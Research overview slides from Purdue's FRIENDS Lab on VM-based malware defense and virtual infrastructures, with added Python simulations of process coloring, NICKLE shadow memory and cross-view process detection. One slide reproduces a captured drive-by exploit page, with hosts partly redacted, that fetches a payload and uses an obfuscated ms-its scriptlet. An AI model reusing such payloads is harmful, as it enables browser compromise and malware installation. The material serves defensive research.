Research at FRIENDS Lab
http://friends.cs.purdue.edu
Dongyan Xu, Associate Professor
Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS), Purdue University
Research Overview
Malware Defense
• Honeyfarm (Collapsar)
• Playground (vGround)
• VM introspection (OBSERV)
• OS info. flow (Proc. Coloring)
• Kernel rootkit (NICKLE)
• Reverse engr. (AutoFormat)
Virtual Infrastructures
• VIOLIN virtual infrastructure
• Infrastructure adaptation
• Infrastructure snapshot
• Real-world deployment (http://www.nanohub.org)
Virtualization Technology (Xen, QEMU, VirtualBox, KVM, VMware)
Project 1: Process Coloring: Information Flow-based Malware Defense
• Funded by IARPA through AFRL
• One-sentence summary: propagating and logging provenance information ("colors") along OS-level information flows for malware detection and sensitive data protection
• Prototype integration with Southwest Research Institute
• Demo CD completed today!
PC Usage Scenario: Server-Side Malware Defense
[Figure labels: Initial coloring; init, rc; s30sendmail, s45named, s55sshd, s80httpd; Coloring diffusion; httpd, /bin/sh, wget, netcat, Local files, Rootkit; Syscall Log; /etc/shadow (Confidential Info)]
• Capability 1: PC malware alert ("No shell process should have the color of Apache")
• Capability 2: Color-based identification of malware break-in point
• Capability 3: Color-based log partition for contamination analysis
Demo at: http://friends.cs.purdue.edu/projects/pc/pc-demo.html
PC Usage Scenario: Client-Side Malware Defense
[Figure labels: www.malicious.net; firefox (Web Browser), turbotax (Tax), warcraft (Games), notepad (Editor); Agobot; Tax files]
PC malware alert: "Web browser and tax colors should never mix"
Demo at: http://friends.cs.purdue.edu/projects/pc/files/sinkfile.avi
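The two usage scenarios above, as an added example that is not part of the original slides or the Process Coloring prototype: a small simulator seeds each service with a color, diffuses colors along fork/exec/read/write events from a constructed syscall log, raises the two alerts quoted on the slides, and slices the log by color. The log entries, pids, paths, rule names and the color diffusion policy (exec keeps the process's colors and adds the binary's) are assumptions made for the illustration.

```python
"""Process Coloring, simulated on a constructed syscall log (added example)."""
from collections import defaultdict

# Constructed syscall log entries: (pid, syscall, argument). Not real data.
SERVER_LOG = [
    (80, "accept", "10.0.0.5:4321"),   # httpd takes a connection
    (80, "fork", 100),                 # httpd spawns a worker
    (100, "exec", "/bin/sh"),          # the worker becomes a shell
    (100, "fork", 101),
    (101, "exec", "/usr/bin/wget"),
    (101, "write", "/tmp/rk.tgz"),     # downloaded payload lands on disk
    (55, "fork", 102),                 # unrelated sshd login session
    (102, "exec", "/bin/sh"),          # a legitimate login shell
]
CLIENT_LOG = [
    (200, "write", "/home/u/Downloads/agobot.exe"),  # browser saves a file
    (200, "fork", 201),
    (201, "exec", "/home/u/Downloads/agobot.exe"),
    (201, "read", "/home/u/tax/return.tax"),         # bot reads tax data
    (300, "read", "/home/u/tax/return.tax"),         # turbotax itself
]

class ColorTracker:
    def __init__(self):
        self.proc_colors = defaultdict(set)   # pid  -> colors
        self.proc_name = {}                   # pid  -> program name
        self.file_colors = defaultdict(set)   # path -> colors
        self.log = []      # (index, entry, colors of the acting process)
        self.alerts = []   # (rule, log index, pid); index = break-in point

    def seed_process(self, pid, name, color):   # initial coloring at boot
        self.proc_name[pid] = name
        self.proc_colors[pid].add(color)

    def seed_file(self, path, color):
        self.file_colors[path].add(color)

    def run(self, log, rules):
        for idx, (pid, call, arg) in enumerate(log):
            colors = self.proc_colors[pid]          # the live set, mutated below
            if call == "fork":                      # child inherits parent's colors
                self.proc_colors[arg] = set(colors)
                self.proc_name[arg] = self.proc_name.get(pid, "?")
            elif call == "exec":                    # program changes, colors stay,
                self.proc_name[pid] = arg.rsplit("/", 1)[-1]
                colors |= self.file_colors[arg]     # and the binary's colors join
            elif call == "read":                    # file -> process
                colors |= self.file_colors[arg]
            elif call == "write":                   # process -> file
                self.file_colors[arg] |= colors
            self.log.append((idx, (pid, call, arg), frozenset(colors)))
            for rule, pred in rules:                # first hit per (rule, pid)
                seen = {(a[0], a[2]) for a in self.alerts}
                if (rule, pid) not in seen and pred(self, pid):
                    self.alerts.append((rule, idx, pid))
        return self.alerts

    def partition(self, color):
        """Color-based log partition: entries made by color-tainted processes."""
        return [e for e in self.log if color in e[2]]

def shell_with_color(color):
    return lambda t, pid: (t.proc_name.get(pid) in ("sh", "bash")
                           and color in t.proc_colors[pid])

def colors_mix(a, b):
    return lambda t, pid: {a, b} <= t.proc_colors[pid]

SERVER_RULES = [("No shell process should have the color of Apache",
                 shell_with_color("httpd"))]
CLIENT_RULES = [("Web browser and tax colors should never mix",
                 colors_mix("web", "tax"))]

def run_server_scenario():
    t = ColorTracker()
    t.seed_process(80, "httpd", "httpd")   # colors given by the init scripts
    t.seed_process(55, "sshd", "sshd")
    t.run(SERVER_LOG, SERVER_RULES)
    return t

def run_client_scenario():
    t = ColorTracker()
    t.seed_process(200, "firefox", "web")
    t.seed_process(300, "turbotax", "tax")
    t.seed_file("/home/u/tax/return.tax", "tax")
    t.run(CLIENT_LOG, CLIENT_RULES)
    return t

if __name__ == "__main__":
    s = run_server_scenario()
    print("server alerts:", s.alerts)
    print("httpd-colored log slice:", [e[1] for e in s.partition("httpd")])
    print("client alerts:", run_client_scenario().alerts)
```

The alert tuple carries the log index at which the rule first fired, which is the slide's "break-in point" (the exec of /bin/sh by the httpd-colored worker), and `partition("httpd")` returns only the entries a contamination analyst needs to look at, leaving the sshd session out.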
Project 2: Strategic Defense against Kernel Rootkit Attacks
• Kernel rootkits: stealthy and foundational threat to cyberspace
• Current defense:
  • Symptom-based detection
  • Disruption to production system
  • Manual forensics
• Strategic defense:
  • Proactive indication before attack
  • Automatic avoidance by "steering away" production system (non-stop operation)
  • Live forensics for future protection
Integrated Defense Scenario
[Figure labels: Right before attack / After threat indication; Production VM and Forensics VM (Guest OS over VMM); Indication, Avoidance, Fork, Clean-up, Forensics; Rootkit Profile; Kernel Guarding Code]
Results with Real-World Kernel Rootkits [RAID08 Best Paper Award]
• Indicating and preventing kernel rootkit attacks at VMM level
Thank you!
For more information:
URL: http://friends.cs.purdue.edu (on a VM)
Google: "Purdue virtualization friends"
Email: dxu@cs.purdue.edu
NICKLE: Kernel Rootkit Indicator ("No Instruction Creeping into Kernel Level Executed")
• Step 1: Create two memory spaces
  • Standard memory
  • Shadow memory
• Step 2: Authenticate and copy kernel code to shadow memory
• Step 3: Memory access dispatch
  • Kernel code fetch -> shadow memory
  • All other accesses -> standard memory
[Figure labels: Guest OS; VMM; NICKLE; Kernel Code in Standard memory and in Shadow memory]
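The three steps above, as an added example that is not code from the slides or from the NICKLE prototype: a toy VMM keeps a standard and a shadow memory, copies a kernel code region into the shadow only if its hash is trusted, serves kernel-mode instruction fetches from the shadow, and records an indication whenever the fetched bytes differ from what the guest placed in standard memory. The kernel image bytes, the addresses, the use of SHA-256 and a trusted-hash set computed from the constructed image are all assumptions for the illustration.

```python
"""NICKLE-style memory dispatch, simulated (added example)."""
import hashlib

KERNEL_BASE = 0x1000
MODULE_BASE = 0x3000
MEM_SIZE = 0x4000

# Constructed "kernel text": 63 filler bytes (0x90) and a final 0xC3.
KERNEL_IMAGE = b"\x90" * 63 + b"\xc3"
# In a deployment the trusted hash would come from a trusted source; here it
# is computed from the constructed image (assumption for the example).
TRUSTED_HASHES = {hashlib.sha256(KERNEL_IMAGE).hexdigest()}

class Nickle:
    def __init__(self, trusted_hashes):
        self.standard = bytearray(MEM_SIZE)   # what the guest reads and writes
        self.shadow = bytearray(MEM_SIZE)     # only authenticated code lands here
        self.trusted = set(trusted_hashes)
        self.indications = []                 # (addr, reason)

    # Guest data accesses always hit standard memory (Step 3, "all other").
    def guest_write(self, addr, data):
        self.standard[addr:addr + len(data)] = data

    def guest_read(self, addr, n):
        return bytes(self.standard[addr:addr + n])

    # Step 2: authenticate a code region and copy it into shadow memory.
    def authenticate_and_copy(self, start, length):
        region = bytes(self.standard[start:start + length])
        if hashlib.sha256(region).hexdigest() not in self.trusted:
            return False
        self.shadow[start:start + length] = region
        return True

    # Step 3: kernel-level instruction fetches are served from the shadow.
    # A mismatch with standard memory means the guest is about to run code
    # that was never authenticated; the shadow bytes are what actually run.
    def fetch(self, addr, n, kernel_mode):
        if not kernel_mode:
            return bytes(self.standard[addr:addr + n])
        code = bytes(self.shadow[addr:addr + n])
        if code != self.guest_read(addr, n):
            self.indications.append((addr, "unauthenticated kernel code fetch"))
        return code

def demo():
    vmm = Nickle(TRUSTED_HASHES)
    vmm.guest_write(KERNEL_BASE, KERNEL_IMAGE)               # kernel loads
    copied = vmm.authenticate_and_copy(KERNEL_BASE, len(KERNEL_IMAGE))

    # Constructed misbehaviour: one byte of kernel text is overwritten and an
    # unauthenticated blob appears in the module area. Both land in standard
    # memory only; the module blob's hash is unknown, so it is never copied.
    vmm.guest_write(KERNEL_BASE + 16, b"\xe9")
    vmm.guest_write(MODULE_BASE, b"\xcc" * 8)
    module_copied = vmm.authenticate_and_copy(MODULE_BASE, 8)

    return {
        "kernel_copied": copied,                 # True
        "module_copied": module_copied,          # False
        "clean_fetch": vmm.fetch(KERNEL_BASE, 4, kernel_mode=True),
        "patched_fetch": vmm.fetch(KERNEL_BASE + 16, 1, kernel_mode=True),
        "patched_data_read": vmm.guest_read(KERNEL_BASE + 16, 1),
        "module_fetch": vmm.fetch(MODULE_BASE, 4, kernel_mode=True),
        "indications": list(vmm.indications),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The dispatch is the whole point: a data read of the patched address still returns the guest's overwritten byte, so the guest kernel looks unchanged to itself, while the instruction fetch at the same address returns the authenticated original and leaves an indication in the VMM's log.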
Collapsar Honeyfarm [USENIX Security'04]
[Figure labels: Domain A, Domain B, Domain C, each with a Redirector; Front-End; Collapsar Center with VM-based Honeypots, Management Station and Correlation Engine]
• Benefit 1: Centralized management of honeypots w/ distributed presence
• Benefit 2: Off-site attack occurrence
• Benefit 3: Convenience for real-time attack correlation and log mining
Collapsar as a Client-side Honeyfarm
[Figure labels: Malicious Web Server; Domain A, Domain B, Domain C, each with a Redirector; Front-End; Collapsar Center with VM-based Honeypots]
• Active honeypots w/ vulnerable client-side software
  • Web browsers (e.g., IE, Firefox, …)
  • Email clients (e.g., Outlook, …)
• PlanetLab (310 sites)
• [HoneyMonkey, NDSS'06]: 288 malicious sites / 2 zero-day exploits
A Real Incident [JPDC'06]
• Upon clicking a malicious URL: http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
Captured page source (addresses redacted as on the slide):
<html><head><title></title></head><body>
<style> * {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")} </style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>
<PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET>
<script>
try{ document.write('<object data=`ms-its: mhtml:file: //C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+ 'm::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>'); }catch(e){}
</script>
</body></html>
• Microsoft security bulletins shown: MS05-002, MS03-011, MS04-013
• 22 unwanted programs installed without user's consent!
vGround: A Virtual Worm Playground (demo) [RAID'05]
A worm playground:
• High fidelity: VM, full-system virtualization
• Strict confinement: VN, link-layer network virtualization
• Easy deployment: locally deployable
• Efficient experiments
  • Image generation time: 60 seconds
  • Boot-strap time: 90 seconds
  • Tear-down time: 10 seconds
[Figure label: dallas.cs.purdue.edu]
In "Fighting Computer Virus Attacks", Peter Szor, USENIX Security Symp., 2004
OBSERV: "Out-of-the-Box" Malware Detection
State-of-the-art malware defense: running anti-malware software inside the monitored system
• Advantage: they can see everything (e.g., files, processes…)
• Disadvantage: they may not see anything!
[Figure labels: IE, Firefox, VirusScan, … over OS Kernel]
Why "Out-of-the-Box"?
• Current approach fundamentally flawed
  • Anti-malware software and protected software running at the same privilege level
  • Lack of root-of-trust
• Solution: going "out-of-the-box"
[Figure labels: VirusScan, IE, Firefox, … over OS Kernel; Virtual Machine Monitor (VMM) marked "?"]
The "Semantic-Gap" Challenge
• What we can observe:
  • Low-level states: memory pages, disk blocks…
  • Low-level events: privileged instructions, interrupts, I/O…
• What we want to observe:
  • High-level semantic states: files, processes…
  • High-level semantic events: system calls, context switches…
[Figure labels: VirusScan; Semantic Gap; Guest OS; Virtual Machine Monitor (e.g., VMware, Xen)]
Our Solution: OBSERV
OBSERV: "Out-of-the-Box" with SEmantically Reconstructed View
A new mechanism missing in existing VMMs [ACM CCS'07]
[Figure labels: IE, Firefox, … over OS Kernel; OBSERV inside the Virtual Machine Monitor (VMM)]
New Capabilities Enabled by OBSERV
[Figure labels: Inside-the-box View vs. OBSERV View, with Diff; IE, Firefox, … over OS Kernel; OBSERV in the Virtual Machine Monitor (VMM)]
• Capability I: Invisible system logging
• Capability II: Malware detection by view comparison
• Capability III: External run of COTS anti-malware software
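Capability II and the semantic-gap slide before it, as an added example that is not code from the slides or from OBSERV itself: a constructed guest memory image holds task structures in a singly linked list; the inside-the-box view walks the kernel's links the way an in-guest process lister would, while the reconstructed view recognises task structures directly in the raw bytes, and the diff yields whatever is present in memory but absent from the list. The struct layout (a magic tag, pid, next offset, name), the 32-byte slot alignment, the memory size and the process names are assumptions made for the illustration; a real reconstruction would instead use the guest kernel's actual data-structure definitions.

```python
"""Cross-view process detection over a constructed memory image (added example)."""
import struct

# Constructed task struct: magic, pid, offset of next task (0 = end), name.
TASK_FMT = "<4sII16s"
TASK_SIZE = struct.calcsize(TASK_FMT)   # 28 bytes
SLOT = 32                               # structs are 32-byte aligned
MAGIC = b"TASK"
MEM_SIZE = 1024
HEAD = SLOT                             # the first task (pid 1) lives here

def build_memory(procs):
    """Lay the processes out as a singly linked list in a fresh memory image."""
    mem = bytearray(MEM_SIZE)
    for i, (pid, name) in enumerate(procs):
        off = HEAD + i * SLOT
        nxt = HEAD + (i + 1) * SLOT if i + 1 < len(procs) else 0
        mem[off:off + TASK_SIZE] = struct.pack(TASK_FMT, MAGIC, pid, nxt, name.encode())
    return mem

def read_task(mem, off):
    magic, pid, nxt, name = struct.unpack_from(TASK_FMT, mem, off)
    return magic, pid, nxt, name.rstrip(b"\x00").decode()

def unlink_task(mem, pid):
    """Constructed test input: drop one struct out of the list so in-guest
    tools no longer see it, while its bytes stay where they are in memory."""
    off = HEAD
    while off:
        _, _, nxt, _ = read_task(mem, off)
        if nxt and read_task(mem, nxt)[1] == pid:
            _, _, after, _ = read_task(mem, nxt)
            struct.pack_into("<I", mem, off + 8, after)   # predecessor.next = victim.next
            return True
        off = nxt
    return False

def inside_view(mem):
    """What a process lister inside the guest sees: follow the kernel's links."""
    seen, off = [], HEAD
    while off:
        _, pid, nxt, name = read_task(mem, off)
        seen.append((pid, name))
        off = nxt
    return seen

def observ_view(mem):
    """VMM-side reconstruction: scan raw memory for task structs, ignoring links."""
    found = []
    for off in range(0, MEM_SIZE - TASK_SIZE + 1, SLOT):
        magic, pid, _, name = read_task(mem, off)
        if magic == MAGIC:
            found.append((pid, name))
    return found

def hidden_processes(mem):
    """Capability II: the diff between the two views."""
    return sorted(set(observ_view(mem)) - set(inside_view(mem)))

def demo():
    mem = build_memory([(1, "init"), (42, "sshd"), (1337, "bot"), (77, "httpd")])
    unlink_task(mem, 1337)
    return inside_view(mem), observ_view(mem), hidden_processes(mem)

if __name__ == "__main__":
    inside, reconstructed, hidden = demo()
    print("inside-the-box view:", inside)
    print("reconstructed view: ", reconstructed)
    print("hidden:             ", hidden)
```

The scan in `observ_view` is where the semantic gap is crossed: it turns memory pages (low-level state) into a process list (high-level state) without trusting any pointer the guest kernel maintains, which is why an unlinked entry still shows up.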
AutoFormat: Malware Protocol Reverse Engineering [NDSS'08]
• Given malware binary, infer malware protocol format
Inferring Slapper Worm (Botnet) Protocol
[Figure labels: Nested data structure declaration, with fields numbered 1, 2, 3; Compiler inserted gap]
VIOLIN: Portable, Adaptive Virtual Environments [TR'03, IEEE Computer'05]
• Adaptive virtual environments on a shared hosting infrastructure
[Figure labels: Internet; DB]
Adaptation Architecture and Sample Scenario (Demo) [IEEE ICAC'06]
[Figure labels: VMs on VMMs with VIOLIN Switches and Monitoring Daemons over the Physical Network; Adaptation Manager; CPU Update; Scale Up; Migrate]
Live VIOLIN Snapshot (Demo) [ACM/IEEE VTDC'07]
[Figure labels: Snapshot, Resume; Hosting center, Hosting center]
• Useful for application- and OS-transparent recovery from
  • Crashes, failures, and disasters
  • Unexpected power/network outage
• And for VIOLIN replay